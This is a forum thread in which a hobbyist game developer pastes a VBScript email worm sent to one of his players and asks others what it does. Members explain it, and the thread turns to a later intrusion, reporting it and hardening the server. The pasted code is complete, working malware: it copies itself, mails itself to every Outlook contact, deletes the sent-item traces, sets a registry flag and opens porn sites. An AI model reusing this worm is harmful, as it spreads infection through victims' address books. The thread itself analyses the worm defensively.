Urgent Help Plz

[Warren-Plus]

Hi all. Recently i have been making an online game and on Sunday i banned a player on there but when he found out who had reported him to me he sent them a script or something.

I worked out part of it changed their homepage to a porn site but i dunno if there is anything else in there.

I have split it up incase there is something.

Code:

On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

Code:

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Code:

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://********.*************.net/*******/1.htm")
elseif r=2 Then
WS.Run("http://*******.****.com/_XMCM/*******/1.htm")
elseif r=3 Then
WS.Run("http://www2.*********.com/*******/******/1.htm")
ElseIf r=4 Then
WS.Run("http://******.******.tv/1.htm")
End If

Code:

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
 Set Mapi=Outlook.GetNameSpace("MAPI")
 Set Lists=Mapi.AddressLists
 For Each ListIndex In Lists
  If ListIndex.AddressEntries.Count <> 0 Then
   ContactCount = ListIndex.AddressEntries.Count
   For Count= 1 To ContactCount
    Set Mail = Outlook.CreateItem(0)
    Set Contact = ListIndex.AddressEntries(Count)
    Mail.To = Contact.Address
    Mail.Subject = "Homepage"
    Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
    Set Attachment=Mail.Attachments
    Attachment.Add Folder & "\homepage.HTML.vbs"
    Mail.DeleteAfterSubmit = True
    If Mail.To <> "" Then
    Mail.Send
    WS.regwrite "HKCU\software\An\mailed", "1"
   End If
   Next
  End If
 Next
End if
End Function

Can anyone tell me if this does anything else or if i should do something about it ?

Brendan

PS. I didnt know if this was the right section. been a while since I been on here.

[contink]

Well if you have Outlook installed on that machine your entire address book will have gotten an email that tells them to go check out a porn site if I'm reading that correctly.

It should only do it once I think but all in all I'd guess the person who received it needs to learn not to run attachments and a bit more about security!

As to the rest it deletes your existing homepage(s) and replaces it/them with a random porn site... Oh and I believe it writes a copy of itself into a folder somewhere too..


No idea if it would work (not about to try it!) but yeah, not the nicest nugget to send.

[SYNACK]

Yeap, as contink says it creates a copy of itself in the temp folder and emails itself as an attachment to everyone in the outlook address book for fun. It then writes a flag for each email sent to the registry to notify it in case it is run again so that it does not bother with the emails the the same users a second time.

The person that sent it may not have had a choice in the matter, their machine could very well have been hijacked.

[notalot]

i could be way off the mark here but it looks like it uses outlook to send a vbs that changes the homepage (to 1 of 4 pages) to every one in your address book.

please correct me if im wrong.

started wreading before the other posts exsisted

[ICT_GUY]

Nod picked it up as a threat as soon as I loaded the page up. odd that.

[Warren-Plus]

Thnx guys. Should i do anything about this ?

Brendan

[SYNACK]

Nod picked it up as a threat as soon as I loaded the page up. odd that.

Built in code filtering probably, I'm pretty sure it will do the same for jscript etc. Its a nice feature just so long as it is not tied up to a Symantec solution. When one of those gets a little confused it just breaks all web pages with scripts on them.

[SYNACK]

Thnx guys. Should i do anything about this ?

Brendan

Tell the guy to stop opening random attachments and hook himself up with a virus checker. It does not look to cause any lasting damage apart from leaving rubbish in the registry under this key HKCU\software\An\mailed. Just set the home page back and prescribe a dose of common sense for the victim.

I would also run a spyware scan on the system as the pages that it directs you to could have hit the system with something else. I have looked through the code and can't see anything that would actually set the homepage to something different. I suspect that this was done by the page that it redirected you to rather than the script.

[Edu-IT]

He may want to contact the people in his address book too to explain.

[Warren-Plus]

Rite this just got serious. He has now gained access to my PC (dont know how) and attacked my server and also my staff. I have him IP logged on my forums and i have another IP he uses for his server.

What can i do ?

Brendan

[GrumbleDook]

Go to your ISP, get them to get the police involved (or do so yourself).

Whilst this may be seen to be a minor thing it is still a breach of the law.

[FN-GM]

Go to your ISP, get them to get the police involved (or do so yourself).

Whilst this may be seen to be a minor thing it is still a breach of the law.

I agree with you there. What has be managed to do?

[contink]

I'd be looking to increase the network protection on your systems...

- A hardware firewall would be a very good start

- Check antivirus and malware protection

- Review policies regarding systems use and go through the common sense stuff about not opening attachments, etc...


If they're into your machines though I think the primary thing I'd be doing is pulling my net connection out of the wall to stop any further invasions before addressing the above through a secured system from elsewhere.

Best of luck...

[Warren-Plus]

I agree with you there. What has be managed to do?

Well he has gathered personal information about players on my game that are stored on my PC. Since posting this he came on last nite and was doing something last night.

I still have no idea about how he got into the files or if he has done anything else to my java files. ill find out later on today when get home from school and recompile my server.

Also does anyone here kno any cheap game hosting services. The cheapest ive found is £15 a month

Brendan

[contink]

Can I assume from your comments that you're hosting a game server on a machine at home via your ADSL or cable connection?

Can I also assume that you haven't protected this machine using a firewall or locked down the ports to the absolute minimum?

If the question so far is "no", your really need to spend a bit of time learning about hardening your server and look to invest in a firewall... smoothwall will do an excellent job if you can find an old box from somewhere to host it on.


As to game servers, can't help much....

But your primary concern at this point is to notify ALL your game users that their details have been compromised and to start changing passwords on ALL their forum, online banking, etc... accounts. You can bet most of them will be using the same username/ID and password in a plethora of places so if their password (even the hash) is compromised it's only a matter of time before things like ebay, paypal, etc... start getting hacked..

They will also need to check their AV and malware security, firewalls, etc... because you can bet your script kiddie hacker/cracker is going to be having fun with trying to crack their home PC's, email addresses and all the rest.

In truth your game is currently the last of your problems... Some serious warnings to your users and a lot of reading up on security, etc... is a priority now.